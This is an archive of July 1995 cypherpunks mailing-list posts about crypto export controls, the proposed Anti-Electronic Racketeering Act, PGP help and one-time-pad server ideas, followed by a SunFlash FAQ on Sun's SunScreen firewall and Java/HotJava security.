    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Thu, 13 Jul 95 14:02:38 PDT
To: cypherpunks@toad.com
Subject: HR361
Message-ID: <9507132102.AA13309@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone previously noted that HR361, the omnibus export
administration act, would require the administration to assess the
impact of the current crypto export controls on the software industry?

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Thu, 13 Jul 95 15:26:31 PDT
To: cypherpunks@toad.com
Subject: The Anti-Racketeering fiasco meets Mozilla
Message-ID: <0gDoBDvcwapi@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I was just talking with a friend, and had the most vile thought.

Mallet works part time for the Justice Department.  His job is
entrapment of random individuals.  He has a Web server running the
Netscape Commerce Server.

When a potential victim is lured into looking at Mallet's home page with
Mozilla, the poor sap is rewarded by a server-side push of some small
piece of contraband software.  Many victims will simply move off the
page, forgetting that the document is now in their Netscape cache.
They're toast.  Others might clear their cache, but the server still
shows that the file was sent.  They're now guilty of both receiving and
concealing contraband.  And maybe destruction of evidence and/or
interfering with law enforcement.

I'm only raving like this because the whole Anti-Racketeering bill has
me both scared and really pissed off.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAWbGBvikii9febJAQExKgP9HApgUEHkIaABuiQ/Lx4jfcfG6WUT7r6U
TgiQ83+yvYBt2EeWIlF3uqUN4PEO8cLYsDjthpesI8nDV2HpjTCbiZ0g+zGJlOmi
ps8vfRRK0A8elyCkTy2b4NlwR4Kre6iqYJfr9+ZA1rW019ZfvullZw9TAPDrhfLj
cP780NHfhn4=
=sRJY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 15:10:28 PDT
To: Douglas Barnes <cman@communities.com>
Subject: Re: Fight, or Roll Over?
In-Reply-To: <v02120d19ac2aa1f17f4f@[199.2.22.120]>
Message-ID: <Pine.ULT.3.91.950713170704.14454B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Douglas Barnes wrote:

> Since the Anti-Electronic Racketeering Act of 1995 might as well
> be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
> Tim throw in the towel already, when the bill hasn't even made it
> through committee yet.

I don't think Tim threw in the towell on this bill, but has come to 
realize that the overall war on privacy cannot be won by concentrating on 
the individual battles.  We've ALL got to take a deep breath and come up 
with a different plan of attack; a plan that the TLAs and spooks will be 
unable to defend against.  Right now, as long as we're kept busy with 
individual bills and initiatives, they have us just where they want us.


____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: truher@mojones.com (Joel B. Truher)
Date: Thu, 13 Jul 95 19:38:26 PDT
To: beta-testers@mojones.mojones.com
Subject: The MoJo Wire thanks you
Message-ID: <v02120d0eac2b65b1c651@[204.188.118.233]>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for your help in our beta test!  Please come back soon,
and send me mail if you'd like to be removed from this mailing
list -- we may send a new Web product announcement every few months,
and you'll soon receive a survey of your opinion of our site.

More info on The MoJo Wire:


             "More fun than a secret decoder ring!"
                               -- Jim Hightower

  "Mother Jones magazine is turning the tables [on Gingrich]"
                               -- LA Times

Mother Jones is pleased to announce the official release of our
redesigned WWW site, now called The MoJo Wire, on July 14th, at:

                    http://motherjones.com

* See Newt Gingrich's secret list of major funders on our "Coin-
  Operated Congress" feature.  Gingrich is fighting the FEC in
  court to keep this information secret, but you can see it here
  for the first time.  See the ten worst, the ten richest, the
  dirt on all of them, and help complete this interactive
  investigation project.

* Newly revamped on-line chat software, called Live Wire,
  provides the best Web-based political discussions anywhere.
  Create hyperlinks in the words of others in this new feature,
  which already contains several lively debates.

* The July/August issue of Mother Jones magazine is available
  only on The MoJo Wire.  Read the full text of the magazine.

Many thanks to our team of two thousand beta testers!  With your
help, we've worked a few of the last kinks out of the system,
added a few things, and now offer the service password-free.

For more information about The MoJo Wire, send mail to
truher@mojones.com, or call me at 415-665-6637.

Joel Truher
Manager, The MoJo Wire






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Thu, 13 Jul 95 14:25:50 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: laws....
In-Reply-To: <9507131959.AA12939@snark.imsi.com>
Message-ID: <Pine.3.89.9507131752.D28886-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain



	Yeah I know what you mean. Like, it's gonna be, bust down your 
fuckin' door and some goon's gonna go, do you have a floppy disk in here?

			Lee.

On Thu, 13 Jul 1995, Perry E. Metzger wrote:

> 
> By the way, I'm really sick of the naming schemes on these laws. Its
> only a matter of time before some 1984ish wag creates the "Omnibus
> Universal Love and Happiness Act of 1998" providing the death penalty
> for possessing trace quantities of marijuana or some such. The
> Orwellian names on some of these bills are simply astounding.
> 
> Perry
> 

------------------------------------------------------------------------------
			     R. Leland Lehrman
			Phone: (203) 777-1827
	  God, Art, Technology and Ecology Research and Development






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "It's supposed to crash like that." <gorkab@sanchez.com>
Date: Thu, 13 Jul 95 14:40:22 PDT
To: cypherpunks@toad.com
Subject: Encryption and ITAR
Message-ID: <009934CEC4F49140.000004E7@sanchez.com>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know how far ITAR reaches?  Is there a list of programs that are illegal
to take from america anywhere else?  My company does a LOT of buisness (80%)
outside the US, and I wonder if they are maybe pissing off the NSA or somthing
with some software they take with them.  (a DES encrypter, and some other
encryption stuff)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Thu, 13 Jul 95 14:35:38 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Mr. Newbie...
In-Reply-To: <Pine.SOL.3.91.950713160218.27008G-100000@use.usit.net>
Message-ID: <Pine.3.89.9507131729.E28886-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain



	Okay folks, here comes Mr. Newbie.

	Duh...How can I figure out how to use pgp. Is there a good place 
to learn the background and basics in a step-by-step easy to understnad 
way? Duh... I think I wanna know...

------------------------------------------------------------------------------
			     R. Leland Lehrman
			Phone: (203) 777-1827
	  God, Art, Technology and Ecology Research and Development






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: waynec@csr.UVic.CA (Wayne  Chapeskie)
Date: Thu, 13 Jul 95 17:38:13 PDT
To: cypherpunks@toad.com
Subject: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <199507140038.RAA20869@clipper.csc.UVic.CA>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


On Jul 13, 11:10am, Timothy C. May wrote:
>
>Every couple of months there's been a new legislative attack on what were
>once basic American freedoms. (Sorry to focus on America. I'm sure you
>folks in the liberty-loving paradises of, say, Germany, are gloating over
>our hand-wringing.)
>
>We're losing the war. We can send in donations to the NRA and EFF, offer
>our support to the ACLU and EPIC, but the tide just keeps rolling in,
>washing away our efforts. The full-time lawmakers in D.C. can proliferate
>new repressive laws much faster than we can fight them.

The current legislative situation regarding computer encryption and
communication technologies is one that firearms owners in the
US and other places have for many years been familiar with.
Every congressional session, a US Representative introduces a bill to
repeal the Second Amendment.  Almost every session, a bill to
prohibit handguns is introduced.  Every session, nearly a dozen or
more bills are introduced which infringe in some way on the rights of
Americans to own and use firearms, through registration, taxation of
ammunition and firearms, licensing of owners, restrictions on imports,
restrictions on dealers, bans of certain types of ammunition, and on
and on and on.

As the NRA might say:  Welcome to the party.  Get used to the heat,
because it isn't going to get any better.

As computer people, we have for some decades now been able to carry
on with our activities essentially unnoticed by the people
Perry Metzger has quite precisely referred to as fascists.

No longer.

Fortunately, most bills introduced into the US congress die without
becoming law.  This is the nature of the US legislative process.
This has included most (but not all) anti-gun rights bills, and will
likely include most anti-crypto and anti-free-speech bills as well.
(As was pointed out, this particular bill has no co-sponsors, and
is unlikely to proceed out of committee).

Unfortunately, proponents of secure and private communications, as
well as proponents of free speech over computer communications
networks, are likely to find themselves under constant legislative
and executive attack for the forseeable future, just as American
gun owners have been.

Wayne Chapeskie

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAgUBMAW8PgB/BYFE8GeZAQHDOwP+Ohzckk5GVkpw29WMzZcaTuCLeYJUrLfi
6HVkFvQsLOOCLKXAnqWyVxxLjUAlEPLs4waVTEgj2zntX3K/zeyejTSFgbM4ITPK
V4UOpTif6WMoZBqossxzNQT+JJDpNC6+b2QmuXIzeC60UO4LbU5OmSRXcQ0uCdbt
z1FSZTt/ol0=
=VAPu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jonathan Shekter" <jshekter@alias.com>
Date: Thu, 13 Jul 95 14:46:17 PDT
To: cypherpunks@toad.com
Subject: Re: SSL RC4 challenge
Message-ID: <9507131745.ZM12634@lennon.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


Quoth tedwards@src.umd.edu:
>On Wed, 12 Jul 1995, alex wrote:
>> Can't we hold off a few weeks on this, so that we can all short the stock
>> once it's been offered? <g>
>
>Hmm...well, considering we have yet to break the first 40-bit RC4 key
>(with 87.1 of the keyspace searched), I think it might be a bit early to
>make financial decisions based on our cracking abilities.


	Yes, but it is highly unlikely we have a valid plaintext/cyphertext
pair. Since the format of SSL is known precisely, we won't have this problem.

	But, yes, let's break the example SSL transaction first.

	- Jonathan

-- 
    ____________________________________________________
   /   Jonathan Shekter   /                            /
  /   Graphics Hack      /   "Probability alone       /
 /  Alias/Wavefront     /   dictates that I exist"   /
/______________________/____________________________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steven ryan <sryan@reading.com>
Date: Thu, 13 Jul 95 14:56:14 PDT
To: cypherpunks@toad.com
Subject: private idaho
Message-ID: <199507132155.RAA15645@zork.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


I am trying to run Private Idaho. I tried the 2.1 version as well as the new
beta version. I have all the files in the same directory as PGP. When I
create a message and select clear sign it spawns a dos box that is all black
with the cursor in the top left corner. If I hit return it closes the box
and gives the following message:

File not found in the sign routine, couldn't create output file.

Any ideas on what might cause this or pointers to additional information
would be welcome.
Steven Ryan
sryan@reading.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 13 Jul 95 15:06:53 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SUN.3.91.950713163526.25718G-100000@escape.com>
Message-ID: <Pine.SUN.3.91.950713175807.25319A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Ray Arachelian wrote:

> So, what countries are left free of encryption regulations? (English 
> speaking preffered, with affordable net access.)  Time to see about 
> getting a new passport...

How about "not respecting international copyright law, and not having 
extradition treaties with the US" ... set up a data haven, we now know 
why we need it soon... charge by the Kbyte, automate the billing, and relax.

Anybody seriously interested? 
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 13 Jul 95 15:17:44 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <199507132116.VAA149322@smtp-gw01.ny.us.ibm.net>
Message-ID: <9507132217.AA10568@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:
[some dense, ambiguous prose]

Jim writes:
> Pardon me if I misunderstood your point.  I haven't read the whole
> bill, but I read the "regardless" phrase with a different emphasis. 
> In short, that language appears to mean that one could be pounded with
> RICO for uploading crypto software even if the crypto is EXPORTABLE.
> 
> The part about subsequent instances of actual access to non-exportable
> crypto by foreigners, etc. appears to address a different situation --
> the situation where the crypto is non-exportable.
[...]

That's exactly my reading of both parts, more lucidly expressed, so I
guess my point wasn't clear before :)

> It is unclear, not having read the entire bill, whether the onerous
> provision in the case of non-exportable crypto would apply in the case
> of exportable crypto.  

Right -- that's the possible ambiguity I was trying to bring out. 

> This email is academic speculation.  This email is not legal advice,
> is not a consultation with counsel, and does not create an attorney-
> client relationship.  (As a condition of entering into an attorney-
> client relationship, I require a formal, ink-signed fee agreement.)

(Ditto, except that I require some years of law school too ;)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 16:32:21 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: On a lighter note...
Message-ID: <Pine.ULT.3.91.950713183010.16887D-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


Well, for all those that are looking for something a little lighter after 
todays activity, the new version of the Geek Code (version 3.0) was 
released this morning.

You can find it via your favorite web browser at:
	http://krypton.mankato.msus.edu/~hayden/geek.html

Or finger me for info on how to get it in ASCII version.

Comments appreciated.  I know the revamped political sections aren't 
perfect, but they are a little better.

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Thu, 13 Jul 95 17:45:41 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: OTP server..
In-Reply-To: <v02130500ac2cc7c4390a@[205.219.167.38]>
Message-ID: <Pine.3.89.9507131817.A10819-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 14 Jul 1995, Black Unicorn wrote:

> >How about WWW one time pad servers? You browse to your
> >favorite OTP server, which has a random number generator
> >running in the background. You tell it to give you a block
> >of X bytes, and mail it to persons 1, 2, 3, ... N.
> 
> I think you're trusting the server a GREAT deal.

Why is that?  The randomness of the data can be easily checked...
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 13 Jul 95 16:46:51 PDT
To: cypherpunks@toad.com
Subject: OTP server..
Message-ID: <199507132346.SAA07316@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



How about WWW one time pad servers? You browse to your
favorite OTP server, which has a random number generator
running in the background. You tell it to give you a block
of X bytes, and mail it to persons 1, 2, 3, ... N.

These people then use this OTP for encrypting a document.
It wouldn't be illegal because you aren't encoding any data
and distributing it.. You're generating raw data. You wouldn't
have to distribute any crypto software, you just xor your
data file with the number of bytes that you were sent
in the mail from the OTP server.. Enough of these things
would be REALLY tough to monitor.. Plus, you could connect
8 different times and just pick one of the sets.. Or you
could just use a portion of the set that you and the receiving
party agreed upon.

Or, instead of using email, you could have a application/x-otp
browser that would collect the OTP that the server sent out
to you over HTTP. (this would be really hard to differentiate
from other data if the server was doing other things at the
same time).

Thoughts?

 Doug Hughes				Engineering Network Services
 doug@eng.auburn.edu			Auburn University



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 13 Jul 95 18:47:40 PDT
To: cypherpunks@toad.com, gnu
Subject: SunFlash 79.05: SunScreen and Java Questions & Answers
Message-ID: <9507140147.AA13138@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[Note the export related stuff, and the 40-bit RC2 & RC4.  But also note
"An International version will be available early in 1996".    --gnu]

==============================================================================
SunFlash 79.05

                 SunScreen and Java Questions & Answers

July  1995         John J. McLaughlin, Editor/Publisher    flash@flashback.com
==============================================================================

     SunScreen is a Product Line comprised of enabling products/solutions
     for doing business transactions on the Internet and other public
     networks. The first product offering in the SunScreen Product Line is
     the SPF-100, a completely new network security device. SPF-100 is a
     dedicated, turnkey solution designed to be network undetectable.
     Shipped pre-configured, SPF- 100 is based on state-of-the-art packet
     screening integrated with encryption to provide private and
     authenticated communications on public networks.

     Several questions about the Java language and the HotJava browser are
     also addressed.

-------------------------------------------------------------------------------

The SunScreen sits on network boundaries, either between two LAN's or
between a LAN and a WAN. It can be used to achieve compartmentalization
within internal networks or to use the Internet or other public
networks as a virtual, secure, private network (VSPN).

The SPF-100 is being targeted towards enterprise customers who require
the highest levels of network security and guaranteed privacy. The
market segments who have expressed the most interest in the SunScreen
SPF-100 include Telecommunications, Finance, Health Care and the
Government.

Due to restrictions imposed on the export of encryption products, the
SunScreen SPF-100 will initially be released only in the U.S.A.. and
Canada. An International version of the product is scheduled for early
1996.

What does SunScreen look like?

The SunScreen consists of two physical components: SPF-100, the
security gateway product is based on a headless SPARC-based system
running an embedded OS and shipped standard with five ethernet ports
(one on-board and four through a Quad Ethernet Card). Four of the ports
are used for screening packets and have no IP address. Since the
embedded OS does not include any user programs, network services, etc.,
it cannot be logged into, nor can any applications be run on it.

The SPF-100 is managed by the SunScreen Administration Station, an
Intel 486-based system running MS-DOS and Windows 3.1. Multiple
SPF-100's may be remotely managed by a single SunScreen Administration
Station, or a single SPF-100 can be managed by multiple SunScreen
Administration Stations. The SPF-100 uses the fifth ethernet port to
establish an encrypted connection to the SunScreen Administration
Station. The SunScreen Administration Station is the only device that
can be used for monitoring, configuring and managing the SPF-100.

A SunScreen is set up to be the point of contact between two
administrative domains such as a private and a public network. Two or
more of the Quad Ethernet ports can be used to bridge the private and
public sides. The on- board Lance Ethernet interface links the SPF-100
to the SunScreen Administration Station through an authenticated and
encrypted connection.

Functionally, the SPF-100 includes an IP level packet screen and a
facility to encrypt and decrypt data transmissions. The SPF-100 packet
screen software runs as an integral part of the SunScreen operating
environment. It tracks the state of session oriented packet
transactions (e.g. TCP) as well as sessionless packet transactions
(e.g., UDP). Maintaining state allows the SunScreen to provide
additional protection from connection stealing.

Effectively, the SPF-100 is invisible to any network entity other than
certified Administration Stations. Interfaces that participate in the
packet screening activity have no IP address and do not respond to any
network probing; they simply pass packets on to the screen.

Using the SunScreen Administrative GUI, an administrator can specify
packet screening rules, specify encryption/decryption criteria,
configure and implement a security policy and monitor the SPF-100
actions on incident network traffic. All transactions between
associated Administrative Stations and SPF-100's are encrypted, adding
security to administrative activity.

What is a packet screen? How is a SunScreen packet screen set up?

A packet screen is a software filter that is imposed on a network data
packet as it passes from a public network to a private network. A
packet screen acts on a data packet according to a set of rules.
Generally speaking, rules are used to discriminate certain packets and
to initiate certain actions on those packets.

SunScreen packet screens are specified by an administrator at the
Administration Station. A packet screen rule is defined by the contents
of three discriminator fields and two actor fields. Two of the
discriminator fields are the packet source and destination address.
These may be addresses of networks, subnets, hosts, or groups of hosts.
The third discriminator field identifies the packet's Internet service
type, e.g. telnet or ftp. This really equates to a socket port number,
so privately defined services can be discriminated as well. SunScreen
also does port coloring to ensure that the source address is consistent
with the ethernet interface.

The two actor fields determine what action is taken if the
discriminating conditions select an incoming packet. One actor simply
determines if the packet passes or fails. The other determines what
explicit action the packet triggers.

An example of a rule would be to discriminate any packet originating at
IP address 192.9.185.28, heading for IP address 129.146.10.14, and
using the telnet service. Any packet that meets these criteria is
allowed to pass through the screen but it is logged as an event.

In SunScreen, the default screening rule is to fail any packet that is
not explicitly allowed to pass.

What encryption alternatives are available in SunScreen?

SunScreen uses a combination of shared key and public key encryption to
provide data privacy and authentication. Privacy means that only the
intended recipient will be able to decipher the message; authentication
means that there is a high level of confidence that the identity of the
message originator is valid and that the message has not been modified
in transmission.

The following encryption software is available on SunScreen: shared
key: 40-bit RC2 and RC4, 56-bit DES public key: 1024-bit RSA, 1024-bit
Diffie-Hellman

Shared key encryption and public key encryption both have advantages
and disadvantages. Shared key encryption is desirable because it
ensures confidence in privacy and yet is moderate in its demands for
processing power during data transformation. It is flawed because both
sender and recipient need access to the same key; having to distribute
a key compromises its secrecy.

In public key encryption, two keys are used - a private key and a
public key.  The two keys are generated in the same operation. One key
can be thought of as the inverse of the other, though there is no
obvious relationship between the two. Any data stream that is encrypted
using one key can be decrypted by the other, but only by the other. The
owner of the private key can distribute the public key at will, but
need never (and should never) distribute the private key. Therefore,
public key encryption solves the twin problems of privacy and
authentication.

Consider the case of a holder of a public key encrypting a message to
be sent to the owner of its private pair. This is a private
transmission because nobody but the private key owner can decrypt the
message. Now consider the case of the of the owner of the private key
sending an encrypted message to a public key pair holder. If this
message decrypts successfully, then it must have come from the private
key owner. It is authenticated. A minor disadvantage to public key
encryption is that each originator needs his own private key and
multiple public keys in order to exchange private messages. A major
disadvantage is that public key cryptography demands a lot of
processing power during data transformations.

SunScreen combines these methods to assure private and authenticated
message transmission across public networks at reasonable performance.

Why was a PC chosen as the Administration Station platform?

>From a marketing perspective, since SunScreen is targeted towards all
customers, not just current Sun customers, it was felt that "a black
box controlled by a PC running Windows" would be easier to explain and
sell and would not require a detailed discussion of UNIX. Additionally,
since the Administration Station is required to be a dedicated system,
it was felt that customers would be more receptive to a lower cost
machine such as a PC, being a dedicated, single-purpose- only system.
Finally, ICG will be offering an end-user solution and due to its
popularity considered the PC a good end-user prototype. A SPARC-based
desktop Administration Station is under consideration

What is Sun ICG?

ICG is the Internet Commerce Group, a Sun business whose charter is to
produce enabling technologies and solutions for doing business over the
Internet and other public networks. ICG will be developing the
SunScreen Product Line, and its first product offering is the SPF-100

What is packet tunneling?

Packet tunneling refers to the capability of encapsulating one packet
in another packet. Together with encryption, tunneling provides data
privacy as well as network topology hiding. Network packets traveling
between two private networks are encrypted and encapsulated in a
wrapper packet at the exit point of one network and unwrapped and
decrypted at the entry point of the other and then passed along to
their destination host.

What is packet vectoring?

Packet vectoring is a capability which enables a packet to be "copied"
and diverted to other areas in addition to its intended route, for
further processing. Packet vectoring enables distributed processing of
packet streams for billing, metering, auditing and intrusion detection
purposes. SunScreen includes the capability to do packet vectoring but
currently does not have an application which would enable it to be used
by customers.

What is SKIP?

SKIP, an acronym for Simple Key Management Internet Protocol, provides
a simple means of secure communications between two SunScreens across
the Internet. SKIP was invented by Ashar Aziz of Sun Microsystems, Inc.
and is currently being considered by the Internet Engineering Task
Force (IETF) as an Internet service standard. It is a sessionless
service that acts as the entry and exit point for secure communications
between two private networks.

When invoked as a service, SKIP encrypts a client packet stream as
described above. Using packet tunneling, client source and destination
encrypted, hiding private network topologies from the public. This
encrypted packet stream is then forwarded to the destination network,
where it is decrypted by another SunScreen supporting the SKIP service.
Once inside the destination private network, the packet stream
continues on its way to the destination host.  Details on the SKIP
specification can be found at http://skip.incog.com/

Does SunScreen support application relays?

SunScreen does not support application relays. There is no way to load
applications on the SPF-100 embedded operating system. However
SunScreen application relays are legitimate, useful adjuncts to a
secure network. They can easily be integrated into a network access
barrier created by a SunScreen.  One or more of the Quad Ethernet
interfaces on the SunScreen can be dedicated to a network supporting
systems with application relays. Using the SunScreen packet filtering
feature, packets appropriate for an application relay would be directed
to the host running that application relay, returned to the SunScreen,
and passed on (or failed) to their destination.

What products compete with SunScreen?

SunScreen is a high-end network security solution. It is unique not
only due to its stealth design and integrated encryption technology,
but also because it includes services which makes it a truly complete
security solution. Other security products on the market today are
either implemented only in software, lack encryption capabilities or
are run layered on top of existing, multi purpose operating systems.
Currently popular security products include Eagle/Raptor, TIS Gauntlet,
CheckPoint FireWall-1, DEC SEAL, ANS Interlock and Livingston
Enterprises Firewall IRX.

Who are likely customers for SunScreen ?

SunScreen is targeted at commercial, enterprise, highly networked
customers.  Commercial enterprises which are critically dependent on
networks for their business functioning are the primary candidates for
this product. Such customer include telecommunications companies,
financial institutions, health care organizations and the Government

How does SunScreen differ from FireWall-1 ?

SunScreen can be regarded as a functional superset of FireWall-1 . It
is a highly sophisticated network security solution targeted at
complex, commercial networks. FireWall-1 restricts its operation to
packet screening. SunScreen provides support for message
encryption/decryption. In addition, SunScreen is invisible from the
network, rendering it more difficult to detect and invade; SunScreen
SPF-100 can only interface to a qualified Administration Station using
an encrypted link, making it very difficult to probe or to modify the
operating environment. SunScreen provides a higher level of security at
a higher price. Users need to evaluate their security needs. FireWall-1
may provide adequate security for the basic security needs of
corporation.

What restriction does the US Government impose on using cryptographic
methods available with SunScreen?

All modes of encryption included with SunScreen are permitted for all
transactions within the U.S.A.. and Canada. Shipping encryption
products including DES, 1024 bit Diffie-Hellman, and 1024 bit RSA
outside the U.S.A..  and Canada requires an export license. An export
license for the use of an encryption product by a foreign based entity
controlled by a U.S.A.. company, has a strong prospect for approval

What special security issues does interaction with the WWW present?

Communication with the WWW and other Internet services such as Archie
and Gopher present no special problem for SunScreen security. Packet
screens can easily be configured to regulate traffic from/to these
services using standard Administration Station tools.

Is there any kind of security certification for this class of product?

Typically, security classification such as B1 , C2 , etc. issued by the
NSA, entails certification of a complete operation environment,
including hardware, OS, applications, etc. Sun has designed the product
to be independent of a multi purpose operating system. The embedded OS
included in the SPF-100, has been stripped off all network services,
user programs, etc. and can be used only for executing the SunScreen
software. However, with the recognition that some sort of security
classification will be required for SunScreen, Sun is working with the
proper authorities to define appropriate classifications for this new
class of security.

------------------------------------------------------------------------------

HotJava Security Answers

First some bulk information on Java security, there are three concepts
here and you have to keep them separate: Safety, Security, and Trust.
They apply to both the language itself (Java) and the browser written
in the language (HotJava).

Java - Security Within The Language:

Safety:

The Java language is safe because the language has no intrinsic
semantics for modifying the trusted computing base. In simple terms
this means that there is no way for pure Java code to modify its own
stack, write on memory it hasn't allocated, or execute methods (invoke
functions) it wasn't explicitly given access too. The mechanisms used
to create this safety are the language design (no semantics), the
virtual machine design (sufficient semantic information is retained in
a 'binary' to verify that the language imposed limits are not
violated), and un-forgeable pointers (no casting). Further memory
reclamation is done by a garbage collector which eliminates hanging
pointer problems. Array indexing and pointer casting is checked at
runtime for validity.

Security:

The Java language is secure because, as an object oriented language the
only way to do anything is to invoke a method on a class, and the only
way to instantiate a class is with the 'new' operator. This operator is
tied into a system class of type ClassLoader which enforces arbitrary
security policies on classes that it loads. Class loaders are thus the
arbiters of the capabilities granted a class they have instantiated.

Trust:

The Java language will supply a class loader capable of verifying a
digital signature on a class prior to loading that class. This allows
different capabilities to be assigned to classes of differing origin.
Further, classes will be able to query the class loader for this
information and thus be able determine if they are being called by a
trusted class. (this is required to export cryptography in the Java
runtime, the crypto classes have to know who is calling them so as to
enforce US mandated restrictions on their operation.)

HotJava - Security Within The Browser:

Safety:

Safety in the HotJava browser revolves around primarily the control of
applets.  Applets are loaded using an anal class loader called the
NetClassLoader. This class loader can control access to system
services. Further the implementation of certain classes (such as File)
recognize when they are being invoked from a class that was loaded from
the network class loader and they enforce additional restrictions. For
example, applets can only open files in two directories on UNIX
systems: /tmp/hotjava and ~/.hotjava (this can be modified with the
READPATH and WRITEPATH environment var's) Further when files are
accessed in these directories a confirmation is raised in the form of a
dialog with the user. There is no way for an applet to get around this
restriction. To open a file it _has_ to use the File class, the network
class loader won't allow it to load a new version of the File class,
and the file class has to have some bound in C code to do its work and
the applet can't bring over its own native code.  Its stuck.

Security:

The browser keeps track of what the applets are doing. Under some
conditions it modifies the capabilities available to an applet after
certain events. For example, the network class loader keeps track of
whether or not the applet came from "within" the firewall (direct
access to host) or "outside" the firewall (through the firewall). It
also keeps track of any files or sockets the applet opens. If the
applet opens any socket or file that is bound "inside" the firewall
(any file, and host inside the firewall) it is prevented from ever
opening a connection to a host "outside" the firewall.

Trust:

The browser is "trusted" code, and the source is available to assist in
developing trust of the code. Further it will be possible to sign all
valid browser classes (package browser.*) with a browser key,
preventing from any subversion of the browser after it has reached
trusted status. (I envision it working something like: Certify the
browser through inspection or what ever, build the classes, sign the
classes, invoke the browser with the public key of the signature.
Destroy the secret key.)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Press announcements and other information about Sun Microsystems are
available on the Internet via the World Wide Web. URL http://www.sun.com

SunFlash - A Full-Text On Demand Newsletter for Users of Sun Computers

John J. McLaughlin - Publisher & Editor   - flash@FlashBack.COM 
Tim Wells          - Associate Editor     - tim@FlashBack.COM 
Mark Wood	   - Distribution Manager - flashadm@FlashBack.COM

Subscriptions to       majordomo@FlashBack.COM 
